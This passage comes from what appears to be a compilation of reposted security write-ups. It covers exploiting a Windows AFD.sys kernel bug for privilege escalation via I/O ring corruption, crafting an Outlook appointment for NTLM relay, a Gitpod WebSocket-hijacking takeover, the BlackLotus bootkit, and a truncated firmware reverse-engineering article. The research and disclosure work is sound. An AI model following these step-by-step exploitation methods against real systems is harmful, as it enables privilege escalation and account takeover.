. The AFD module is the kernel entry point for the Winsock API. Using this information, we analyzed the driver version from December 2022 and compared it to the version newly released in January 2023. These samples can be obtained individually from Winbindex without the time-consuming process of extracting changes from Microsoft patches. The two versions analyzed are shown below.

  • AFD.sys / Windows 11 22H2 / 10.0.22621.608 (December 2022)
  • AFD.sys / Windows 11 22H2 / 10.0.22621.1105 (January 2023)

Ghidra was used to create binary exports for both of these files so they could be compared in BinDiff. An overview of the matched functions is shown below.

Figure 2 — Binary comparison of AFD.sys

Only one function appeared to have been changed, 

afd!AfdNotifyRemoveIoCompletion
. This significantly sped up our analysis of the vulnerability. We then compared both of the functions. The screenshots below show the changed code pre- and post-patch when looking at the decompiled code in Binary Ninja.

Pre-patch, 

afd.sys version 10.0.22621.608
.

Figure 3 — afd!AfdNotifyRemoveIoCompletion pre-patch

Post-patch, 

afd.sys version 10.0.22621.1105
.

Figure 4 — afd!AfdNotifyRemoveIoCompletion post-patch

This change shown above is the only update to the identified function. Some quick analysis showed that a check is being performed based on 

<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode" target="_blank" rel="noreferrer noopener">PreviousMode</a>
. If 
PreviousMode
 is zero (indicating that the call originates from the kernel) a value is written to a pointer specified by a field in an unknown structure. If, on the other hand, 
PreviousMode
 is not zero then 
<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-probeforwrite" target="_blank" rel="noreferrer noopener">ProbeForWrite</a>
 is called to ensure that the pointer set out in the field is a valid address that resides within user mode.

This check is missing in the pre-patch version of the driver. Since the function has a specific switch statement for 

PreviousMode
, the assumption is that the developer intended to add this check but forgot (we all lack coffee sometimes !).

From this update, we can infer that an attacker can reach this code path with a controlled value at 

field_0x18
 of the unknown structure. If an attacker is able to populate this field with a kernel address, then it’s possible to create an arbitrary kernel Write-Where primitive. At this point, it is not clear what value is being written, but any value could potentially be used for a Local Privilege Escalation primitive.

The function prototype itself contains both the 

PreviousMode
 value and a pointer to the unknown structure as the first and third arguments respectively.

Figure 5 — afd!AfdNotifyRemoveIoCompletion function prototype

Reverse Engineering

We now know the location of the vulnerability, but not how to trigger the execution of the vulnerable code path. We’ll do some reverse engineering before beginning to work on a Proof-of-Concept (PoC).

First, the vulnerable function was cross-referenced to understand where and how it was used.

Figure 6 — afd!AfdNotifyRemoveIoCompletion cross-references

A single call to the vulnerable function is made in 

afd!AfdNotifySock
.

We repeat the process, looking for cross-references to 

AfdNotifySock
. We find no direct calls to the function, but its address appears above a table of function pointers named 
AfdIrpCallDispatch
.

Figure 7 — afd!AfdIrpCallDispatch

This table contains the dispatch routines for the AFD driver. Dispatch routines are used to handle requests from Win32 applications by calling 

<a href="https://learn.microsoft.com/en-us/windows/win32/api/ioapiset/nf-ioapiset-deviceiocontrol" target="_blank" rel="noreferrer noopener">DeviceIoControl</a>
. The control code for each function is found in 
AfdIoctlTable
.

However, the pointer above is not within the 

AfdIrpCallDispatch
 table as we expected. From Steven Vittitoe’s Recon talk slides, we discovered that there are actually two dispatch tables for AFD. The second being 
AfdImmediateCallDispatch
. By calculating the distance between the start of this table and where the pointer to 
AfdNotifySock
 is stored, we can calculate the index into the 
AfdIoctlTable
 which shows the control code for the function is 
0x12127
.

Figure 8 — afd!AfdIoctlTable

It’s worth noting that it’s the last input/output control (IOCTL) code in the table, indicating that 

AfdNotifySock
 is likely a new dispatch function that has been recently added to the AFD driver.

At this point, we had a couple of options. We could reverse engineer the corresponding Winsock API in a user space to better understand how the underlying kernel function was called, or reverse engineer the kernel code and call into it directly. We didn’t actually know which Winsock function corresponded to 

AfdNotifySock
, so we opted to do the latter.

We came across some code published by x86matthew that performs socket operations by calling into the AFD driver directly, forgoing the Winsock library. This is interesting from a stealth perspective, but for our purposes, it is a nice template to create a handle to a TCP socket to make IOCTL requests to the AFD driver. From there, we were able to reach the target function, as evidenced by reaching a breakpoint set in WinDbg while kernel debugging.

Figure 9 — afd!AfdNotifySock breakpoint

Now, refer back to the function prototype for 

DeviceIoControl
, through which we call into the AFD driver from user space. One of the parameters, 
lpInBuffer
, is a user mode buffer. As mentioned in the previous section, the vulnerability occurs because the user is able to pass an unvalidated pointer to the driver within an unknown data structure. This structure is passed in directly from our user mode application via the lpInBuffer parameter. It’s passed into 
AfdNotifySock
 as the fourth parameter, and into 
AfdNotifyRemoveIoCompletion
 as the third parameter.

At this point, we don’t know how to populate the data in 

lpInBuffer
, which we’ll call 
AFD_NOTIFYSOCK_STRUCT
, in order to pass the checks required to reach the vulnerable code path in 
AfdNotifyRemoveIoCompletion
. The remainder of our reverse engineering process consisted of following the execution flow and examining how to reach the vulnerable code.

Let’s go through each of the checks.

The first check we encounter is at the beginning of 

AfdNotifySock
:

Figure 10 — afd!AfdNotifySock size check

This check tells us that the size of the 

AFD_NOTIFYSOCK_STRUCT
 should be equal to 
0x30
 bytes, otherwise the function fails with 
STATUS_INFO_LENGTH_MISMATCH
.

The next check validates values in various fields in our structure:

Figure 11 — afd!AfdNotifySock structure validation

At the time we didn’t know what any of the fields correspond to, so we pass in a 

0x30
 byte array filled with 
0x41
 bytes (
AAAAAAAAA...
).

The next check we encounter is after a call to 

<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obreferenceobjectbyhandle" target="_blank">ObReferenceObjectByHandle</a>
. This function takes the first field of our input structure as its first argument.

Figure 12 — afd!AfdNotifySock call nt!ObReferenceObjectByHandle

The call must return success in order to proceed to the correct code execution path, which means that we must pass in a valid handle to an 

IoCompletionObject
. There is no officially documented way to create an object of that type via Win32 API. However, after some searching, we found an undocumented NT function 
<a href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FIoCompletion%2FNtCreateIoCompletion.html" target="_blank" rel="noreferrer noopener">NtCreateIoCompletion</a>
 that did the job.

Afterward, we reach a loop whose counter was one of the values from our struct:

Figure 13 — afd!AfdNotifySock loop

This loop checked a field from our structure to verify it contained a valid user mode pointer and copied data to it. The pointer is incremented after each iteration of the loop. We filled in the pointers with valid addresses and set the counter to 1. From here, we were able to finally reach the vulnerable function 

AfdNotifyRemoveIoCompletion
.

Figure 14 — afd!AfdNotifyRemoveIoCompletion call

Once inside 

AfdNotifyRemoveIoCompletion
, the first check is on another field in our structure. It must be non-zero. It’s then multiplied by 0x20 and passed into 
ProbeForWrite
 along with another field in our struct as the pointer parameter. From here we can fill in the struct further with a valid user mode pointer (
pData2
) and field 
dwLen = 1
 (so that the total size passed to 
ProbeForWrite
 is equal 0x20), and the checks pass.

Figure 15 — afd! Afd!AfdNotifyRemoveIoCompletion field check

Finally, the last check to pass before reaching the target code is a call to 

IoRemoveCompletion
 which must return 0 (
STATUS_SUCCESS
).

This function will block until either:

  • A completion record becomes available for the 
    IoCompletionObject
     parameter
  • The timeout expires, which is passed in as a parameter of the function

We control the timeout value via our structure, but simply setting a timeout of 0 is not sufficient for the function to return success. In order for this function to return with no errors, there must be at least one completion record available. After some research, we found the undocumented function 

<a rel="noreferrer noopener" href="http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FIoCompletion%2FNtSetIoCompletion.html" target="_blank">NtSetIoCompletion</a>
, which manually increments the I/O pending counter on an 
IoCompletionObject
. Calling this function on the 
IoCompletionObject
 we created earlier ensures that the call to 
IoRemoveCompletion
 returns 
STATUS_SUCCESS
.

Figure 16 — afd!AfdNotifyRemoveIoCompletion check return nt!IoRemoveIoCompletion

Triggering Arbitrary Write-Where

Now that we can reach the vulnerable code, we can fill the appropriate field in our structure with an arbitrary address to write to.  The value that we write to the address comes from an integer whose pointer is passed into the call to 

IoRemoveIoCompletion
IoRemoveIoCompletion
 sets the value of this integer to the return value of a call to 
KeRemoveQueueEx
.

Figure 17 — nt!KeRemoveQueueEx return value
Figure 18 — nt!KeRemoveQueueEx return use

In our proof of concept, this write value is always equal to 

0x1
. We speculated that the return value of 
KeRemoveQueueEx
 is the number of items removed from the queue, but did not investigate further. At this point, we had the primitive we needed and moved on to finishing the exploit chain. We later confirmed that this guess was correct, and the write value can be arbitrarily incremented by additional calls to 
NtSetIoCompletion
 on the 
IoCompletionObject
.

LPE with IORING

With the ability to write a fixed value (0x1) at an arbitrary kernel address, we proceeded to turn this into a full arbitrary kernel Read/Write. Because this vulnerability affects the latest versions of Windows 11(22H2), we chose to leverage a Windows I/O ring object corruption to create our primitive. Yarden Shafir has written a number of excellent posts on Windows I/O rings and also developed and disclosed the primitive that we leveraged in our exploit chain. As far as we are aware this is the first instance where this primitive has been used in a public exploit.

When an I/O Ring is initialized by a user two separate structures are created, one in user space and one in kernel space. These structures are shown below.

The kernel object maps to 

nt!_IORING_OBJECT
 and is shown below.

Figure 19 — nt!_IORING_OBJECT initialization

Note that the kernel object has two fields, 

RegBuffersCount
 and 
RegBuffers
, which are zeroed on initialization. The count indicates how may I/O operations can possibly be queued for the I/O ring. The other parameter is a pointer to a list of the currently queued operations.

On the user space side, when calling 

<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ioringapi/nf-ioringapi-createioring" target="_blank">kernelbase!CreateIoRing</a>
 you get back an I/O Ring handle on success. This handle is a pointer to an undocumented structure (HIORING). Our definition of this structure was obtained from the research done by Yarden Shafir.

typedef struct _HIORING {

    HANDLE handle;

    NT_IORING_INFO Info;

    ULONG IoRingKernelAcceptedVersion;

    PVOID RegBufferArray;

    ULONG BufferArraySize;

    PVOID Unknown;

    ULONG FileHandlesCount;

    ULONG SubQueueHead;

    ULONG SubQueueTail;

};

If a vulnerability, such as the one covered in this blog post, allows you to update the 

RegBuffersCount
 and 
RegBuffers
 fields, then it is possible to use standard I/O Ring APIs to read and write kernel memory.

As we saw above, we are able to use the vulnerability to write 

0x1
 at any kernel address that we like. To set up the I/O ring primitive we can simply trigger the vulnerability twice.

In the first trigger we set the 

RegBufferCount
 to 
0x1
.

Figure 20 — nt!_IORING_OBJECT first time triggering the bug

And in the second trigger we set 

RegBuffers
 to an address that we can allocate in user space (like 
0x0000000100000000
).

Figure 21 — nt!_IORING_OBJECT second time triggering the bug

All that remains is to queue I/O operations by writing pointers to forged 

nt!_IOP_MC_BUFFER_ENTRY
 structures at the user space address (
0x100000000
). The number of entries should be equal to 
RegBuffersCount
. This process is highlighted in the diagram below.

Figure 22 — Setting up user space for I/O Ring kernel R/W primitive

One such 

nt!_IOP_MC_BUFFER_ENTRY
 is shown in the screenshot below. Note that the destination of the operation is a kernel address (
0xfffff8052831da20
) and that the size of the operation, in this case, is 
0x8
 bytes. It is not possible to tell from the structure if this is a read or write operation. The direction of the operation depends on which API was used to queue the I/O request. Using 
<a rel="noreferrer noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/ioringapi/nf-ioringapi-buildioringreadfile" target="_blank">kernelbase!BuildIoRingReadFile</a>
 results in an arbitrary kernel write and 
kernelbase!BuildIoRingWriteFile
 results in an arbitrary kernel read.

Figure 23 — Example faked I/O Ring operation

To perform an arbitrary write, an I/O operation is tasked to read data from a file handle and write that data to a Kernel address.

Figure 24 — I/O Ring arbitrary write

Conversely, to perform an arbitrary read, an I/O operation is tasked to read data at a kernel address and write that data to a file handle.

Figure 25 – I/O Ring arbitrary read

Demo

With the primitive set up all that remains is using some standard kernel post-exploitation techniques to leak the token of an elevated process like System (PID 4) and overwrite the token of a different process.

Exploitation In the Wild

After the public release of our exploit code, Xiaoliang Liu (@flame36987044) from 360 Icesword Lab disclosed publicly for the first time, that they discovered a sample exploiting this vulnerability in the wild (ITW) earlier this year. The technique utilized by the ITW sample differed from ours. The attacker triggers the vulnerability using the corresponding Winsock API function, 

ProcessSocketNotifications
, instead of calling into the 
afd.sys
 driver directly, like in our exploit.  

The official statement from 360 Icesword Lab is as follows:  
 
“360 IceSword Lab focuses on APT detection and defense. Based on our 0day vulnerability radar system, we discovered an exploit sample of CVE-2023-21768 in the wild in January this year, which differs from the exploits announced by @chompie1337 and @FuzzySec in that it is exploited through system mechanisms and vulnerability features. The exploit is related to 

NtSetIoCompletion
 and 
ProcessSocketNotifications
ProcessSocketNotifications
 gets the number of times 
NtSetIoCompletion
 is called, so we use this to change the privilege count.”  

Conclusion and Final Reflections

You may notice that in some parts of the reverse engineering our analysis is superficial. It’s sometimes helpful to only observe some relevant state changes and treat portions of the program as a black box, to avoid getting led down an irrelevant rabbit hole. This allowed us to turn around an exploit quickly, even though maximizing the completion speed was not our goal.

Additionally, we conducted a patch diffing review of all the reported vulnerabilities in 

afd.sys
 indicated as “Exploitation More Likely”. Our review revealed that all except two of the vulnerabilities were a result of improper validation of pointers passed in from user mode. This shows that having a historical knowledge of past vulnerabilities, particularly within a specific target, can be fruitful for finding new vulnerabilities. When the code base is expanded – the same mistakes are likely to be repeated. Remember, new C code == new bugs . As evidenced by the discovery of the aforementioned vulnerability being exploited in the wild, it is safe to say that attackers are closely monitoring new code base additions as well. 

The lack of support for Supervisor Mode Access Protection (SMAP) in the Windows kernel leaves us with plentiful options to construct new data-only exploit primitives. These primitives aren’t feasible in other operating systems that support SMAP. For example, consider CVE-2021-41073, a vulnerability in Linux’s implementation of I/O Ring pre-registered buffers, (the same feature we abuse in Windows for a R/W primitive). This vulnerability can allow overwriting a kernel pointer for a registered buffer, but it cannot be used to construct an arbitrary R/W primitive because if the pointer is replaced with a user pointer, and the kernel tries to read or write there, the system will crash.

Despite best efforts by Microsoft to kill beloved exploit primitives, there are bound to be new primitives to be discovered that take their place. We were able to exploit the latest version of Windows 11 22H2 without encountering any mitigations or constraints from Virtualization Based Security features such as HVCI.

References

Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability

Microsoft Outlook Elevation of Privilege Vulnerability windows

Original text by Dominic Chell

Today saw Microsoft patch an interesting vulnerability in Microsoft Outlook. The vulnerability is described as follows:

Microsoft Office Outlook contains a privilege escalation vulnerability that allows for a NTLM Relay attack against another service to authenticate as the user.

However, no specific details were provided on how to exploit the vulnerability.

At MDSec, we’re continually looking to weaponise both private and public vulnerabilities to assist us during our red team operations. Having recently given a talk on leveraging NTLM relaying during red team engagements at FiestaCon, this vulnerability particularly stood out to me and warranted further analysis.

While no particular details were provided, Microsoft did provide a script to audit your Exchange server for mail items that might be being used to exploit the issue.

Review of the audit script reveals it is specifically looking for the PidLidReminderFileParameterproperty inside the mail items and offers the option to “clean” it if found:

Diving in to what this property is, we find the following definition:

This property controls what filename should be played by the Outlook client when the reminder for the mail item is triggered. This is of course particularly interesting as it implies that the property accepts a filename, which of could potentially be a UNC path in order to trigger the NTLM authentication.

Following further analysis of the available properties, we also note the PidLidReminderOverride property which is described as follows:

With this in mind, we should likely set the PidLidReminderOverride property in order to trigger Outlook to parse our malicious UNC inside PidLidReminderFileParameter.

Let’s begin to build an exploit….

The first step to exploit this issue is to create an Outlook MSG file; these files are compound files in CFB format. To speed up the generation of these files, I leveraged the .NET MsgKit library.

Reviewing the MsgKit library, we find that the Appointment class defines a number of properties to add to the mail item before the MSG file is saved:

To create our malicious calendar appointment, I extended the Appointment class to add our required PidLidReminderOverride and PidLidReminderFileParameter properties, as shown above.

From that point, we simply need to create a new appointment and save it, before sending to our victim:

This vulnerability is particularly interesting as it will trigger NTLM authentication to an IP address (i.e. a system outside of the Trusted Intranet Zone or Trusted Sites) and this occurs immediately on opening the e-mail, irrespective of whether the user has selected the option to load remote images or not.

This one is worth patching as a priority as its incredibly easy to exploit and will no doubt be adopted by adversaries fast.

Here’s a demonstration of our exploit which will relay the incoming request to LDAP to obtain a shadow credential:

Gitpod remote code execution 0-day vulnerability via WebSockets

Gitpod remote code execution 0-day vulnerability via WebSockets

Original text by Elliot Ward

TLDR

This article walks us through a current Snyk Security Labs research project focusing on cloud based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user’s SCM account. The issues here have been responsibly disclosed to Gitpod and were resolved within a single working day!

Cloud development environments and Gitpod

As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn’t help but wonder about the security implications of adopting these cloud based IDEs.

First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.

In contrast to traditional development, CDEs run on a cloud hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization’s code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.

The security risks of locally installed development environments are not new. However, they historically haven’t received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that lead to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments: 

  • What happens if a cloud IDE workspace is infected with malware?
  • What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
  • What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?

In a current security research project here at Snyk, we examine the security implications of adopting cloud based IDEs. In this article we present a case study of one of the vulnerabilities discovered during our initial exploration in the Gitpod platform. 

Examining the Gitpod platform

Disclaimer: When it came to looking at cloud IDE solutions for our research, we settled on either self-hosted or cloud-based solutions, where the vendor has a clearly defined security policy providing safe harbor for researchers. 

One of the most popular CDE’s is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.

The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burpsuite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod. 

Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard

From the dashboard, it’s easy to integrate with a SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via 

SSH
 and 
HTTPS
 on a subdomain of gitpod.io (i.e 
https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io
) through a Golang-based component called ws-proxy

The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.

Technical details

WebSockets and Same Origin Policy

WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests. 

An interesting aspect of WebSockets from a security perspective, is that a browser security mechanism, the Same Origin Policy (SOP), does not apply. This is the security control which prevents a website from issuing an AJAX request to another website and being able to read the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for Cross Origin requests, such as CSRF related attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.

This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. This attack is similar to a combination of a Cross-Site Request Forgery and CORS misconfiguration. When a WebSocket handshake relies solely upon HTTP cookies for authentication, a malicious website is able to instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through the connection.

When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.

In normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. There was no additional authentication taking place within the WebSocket exchange itself, and the JSONRPC can be invoked via the WebSocket connection.

So far, we’ve found no additional authentication taking place within the established channel — a good sign for any potential attackers. Now, let’s verify that no additional Origin checks are taking place by taking a handshake we have observed and tampering with the Origin header.

This looks promising! It seems that the domain 

evil.com
 is able to issue Cross-Origin WebSocket requests to 
gitpod.io
. However, another security mechanism introduces a challenge.

SameSite Cookie bypass

SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not everyone has adopted them, most popular browsers have made the default value for all cookies which do not explicitly disable 

SameSite
 to be 
Lax
. So while the underlying vulnerability is present, without a bypass for 
SameSite
 cookies our attack would largely be theoretical and only work against a subset of outdated and niche browsers.

So what is a 

site
 in the context of 
SameSite
? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin’s host. If we look at the specifications for 
SameSite
 we can see that subdomains are not considered. This is more relaxed than the specification of an Origin used by the Same Origin Policy, which is comprised of a scheme + host (including subdomains) + port (eg: https://security.snyk.io:8443).

Earlier, we observed that the workspace was exposed via a subdomain on 

gitpod.io
. In the context of 
SameSite
, the workspace URL is considered to be the same site as 
gitpod.io
. So, it should be possible for one workspace to issue a cross-domain 
SameSite
 request to a 
*.gitpod.io
 domain with the original user’s cookies attached. Let’s see if we can leverage an attacker controlled workspace to serve a WebSocket Hijacking payload. 

To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.

As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. We can see in the console output that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a websocket to 

gitpod.io
.

We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. When looking through the features available, it is possible to expose ports in the workspace and make them accessible using a command line utility called 

gitpod-cli
 — available on the path inside the workspace by typing 
gp
. We can invoke 
gp ports expose 8080
, and then set up a basic Python web server using 
python -m http.server 8080
. This in turn creates a new subdomain where the exposed port can be accessed as shown below.

However, the connection failed. This is somewhat concerning and requires more investigation. Here we open the source code and start looking for what could be causing the problem. We found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.

The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:

So, it looks like we can’t serve our content from an exposed port inside the Gitpod hosted workspace and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?

The initial idea was to terminate the 

vscode
 process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted. This appeared to be performed by a local service 
supervisor
. While testing this approach we noticed that when we terminated the process without binding another process to the VS Code port, the 
supervisor
 service will automatically restart the 
vscode
 process, resulting in a brief hang to the UI without a full restart of the workspace.

This brought a promising idea. Can we patch VS Code to serve a built-in exploit for us?

Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.

VS Code contains an API endpoint at 

/version
, which returns the commit of the current version:

We modified it so that the correct 

Content-Type
 of 
text/html
 and the contents of an HTML file were returned. Now, we terminated the 
vscode
 process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:

Finally, we can leverage the JSONRPC methods 

getLoggedInUser
getGitpodTokens
getOwnerToken
, and 
addSSHPublicKey
 to build a payload that grants us full control over the user’s workspaces when an unsuspecting Gitpod user visits our link!

Here it is in action:

We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:

Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!

Timeline

  • Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
  • Mon, Feb. 13, 2023 — Vendor acknowledges vulnerability
  • Tue, Feb. 14, 2023 — New version released and deployed to production SaaS Gitpod instance
  • Tue, Feb. 22, 2023 — CVE-2023-0957 assigned
  • Wed, Mar. 1, 2023 — Vendor releases new version for Gitpod Self-Hosted and issues advisory

Summary

In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.

We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.

BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11

BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11

Original text by Ravie Lakshmanan

A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape.

«This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled,» Slovak cybersecurity company ESET said in a report shared with The Hacker News.

UEFI bootkits are deployed in the system firmware and allow full control over the operating system (OS) boot process, thereby making it possible to disable OS-level security mechanisms and deploy arbitrary payloads during startup with high privileges.

Offered for sale at $5,000 (and $200 per new subsequent version), the powerful and persistent toolkit is programmed in Assembly and C and is 80 kilobytes in size. It also features geofencing capabilities to avoid infecting computers in Armenia, Belarus, Kazakhstan, Moldova, Romania, Russia, and Ukraine.

Details about BlackLotus first emerged in October 2022, with Kaspersky security researcher Sergey Lozhkin describing it as a sophisticated crimeware solution.

«This represents a bit of a ‘leap’ forward, in terms of ease of use, scalability, accessibility, and most importantly, the potential for much more impact in the forms of persistence, evasion, and/or destruction,» Eclypsium’s Scott Scheferman noted.

BlackLotus, in a nutshell, exploits a security flaw tracked as CVE-2022-21894 (aka Baton Drop) to get around UEFI Secure Boot protections and set up persistence. The vulnerability was addressed by Microsoft as part of its January 2022 Patch Tuesday update.

A successful exploitation of the vulnerability, according to ESET, allows arbitrary code execution during early boot phases, permitting a threat actor to carry out malicious actions on a system with UEFI Secure Boot enabled without having physical access to it.

«This is the first publicly known, in-the-wild abuse of this vulnerability,» ESET researcher Martin Smolár said. «Its exploitation is still possible as the affected, validly signed binaries have still not been added to the UEFI revocation list

«BlackLotus takes advantage of this, bringing its own copies of legitimate – but vulnerable – binaries to the system in order to exploit the vulnerability,» effectively paving the way for Bring Your Own Vulnerable Driver (BYOVD) attacks.

Besides being equipped to turn off security mechanisms like BitLocker, Hypervisor-protected Code Integrity (HVCI), and Windows Defender, it’s also engineered to drop a kernel driver and an HTTP downloader that communicates with a command-and-control (C2) server to retrieve additional user-mode or kernel-mode malware.

The exact modus operandi used to deploy the bootkit is unknown as yet, but it starts with an installer component that’s responsible for writing the files to the EFI system partition, disabling HVCI and BitLocker, and then rebooting the host.

The restart is followed by the weaponization of CVE-2022-21894 to achieve persistence and install the bootkit, after which it is automatically executed on every system start to deploy the kernel driver.

While the driver is tasked with launching the user-mode HTTP downloader and running next-stage kernel-mode payloads, the latter is capable of executing commands received from the C2 server over HTTPS.

This includes downloading and executing a kernel driver, DLL, or a regular executable; fetching bootkit updates, and even uninstalling the bootkit from the infected system.

«Many critical vulnerabilities affecting security of UEFI systems have been discovered in the last few years,» Smolár said. «Unfortunately, due the complexity of the whole UEFI ecosystem and related supply-chain problems, many of these vulnerabilities have left many systems vulnerable even a long time after the vulnerabilities have been fixed – or at least after we were told they were fixed.»

«It was just a matter of time before someone would take advantage of these failures and create a UEFI bootkit capable of operating on systems with UEFI Secure Boot enabled.»

Reverse Engineering Yaesu FT-70D Firmware Encryption

Reverse Engineering Yaesu FT-70D Firmware Encryption

Original text by landaire

This article dives into my full methodology for reverse engineering the tool mentioned in this article. It’s a bit longer but is intended to be accessible to folks who aren’t necessarily advanced reverse-engineers.

Background

Ham radios are a fun way of learning how the radio spectrum works, and more importantly: they’re embedded devices that may run weird chips/firmware! I got curious how easy it’d be to hack my Yaesu FT-70D, so I started doing some research. The only existing resource I could find for Yaesu radios was someone who posted about custom firmware for their Yaesu FT1DR.

The Reddit poster mentioned that if you go through the firmware update process via USB, the radio exposes its Renesas H8SX microcontroller and can have its flash modified using the Renesas SDK. This was a great start and looked promising, but the SDK wasn’t trivial to configure and I wasn’t sure if it could even dump the firmware… so I didn’t use it for very long.

Other Avenues

Yaesu provides a Windows application on their website that can be used to update a radio’s firmware over USB:

The zip contains the following files:

1.2 MB  Wed Nov  8 14:34:38 2017  FT-70D_ver111(USA).exe
682 KB  Tue Nov 14 00:00:00 2017  FT-70DR_DE_Firmware_Update_Information_ENG_1711-B.pdf
8 MB  Mon Apr 23 00:00:00 2018  FT-70DR_DE_MAIN_Firmware_Ver_Up_Manual_ENG_1804-B.pdf
3.2 MB  Fri Jan  6 17:54:44 2012  HMSEUSBDRIVER.exe
160 KB  Sat Sep 17 15:14:16 2011  RComms.dll
61 KB  Tue Oct 23 17:02:08 2012  RFP_USB_VB.dll
1.7 MB  Fri Mar 29 11:54:02 2013  vcredist_x86.exe

I’m going to assume that the file specific to the FT-70D, «FT-70D_ver111(USA).exe», will likely contain our firmware image. A PE file (.exe) can contain binary resources in the 

.rsrc
 section — let’s see what this file contains using XPEViewer:

Resources fit into one of many different resource types, but a firmware image would likely be put into a custom type. What’s this last entry, «23»? Expanding that node we have a couple of interesting items:

RES_START_DIALOG
 is a custom string the updater shows when preparing an update, so we’re in the right area!

RES_UPDATE_INFO
 looks like just binary data — perhaps this is our firmware image? Unfortunately looking at the «Strings» tab in XPEViewer or running the 
strings
 utility over this data doesn’t yield anything legible. The firmware image is likely encrypted.

Reverse Engineering the Binary

Let’s load the update utility into our disassembler of choice to figure out how the data is encrypted. I’ll be using IDA Pro, but Ghidra (free!), radare2 (free!), or Binary Ninja are all great alternatives. Where possible in this article I’ll try to show my rewritten code in C since it’ll be a closer match to the decompiler and machine code output.

A good starting point is the the string we saw above, 

RES_UPDATE_INFO
. Windows applications load resources by calling one of the 
FindResource*
 APIs
FindResourceA
 has the following parameters:

  1. HMODULE
    , a handle to the module to look for the resource in.
  2. lpName
    , the resource name.
  3. lpType
    , the resource type.

In our disassembler we can find references to the 

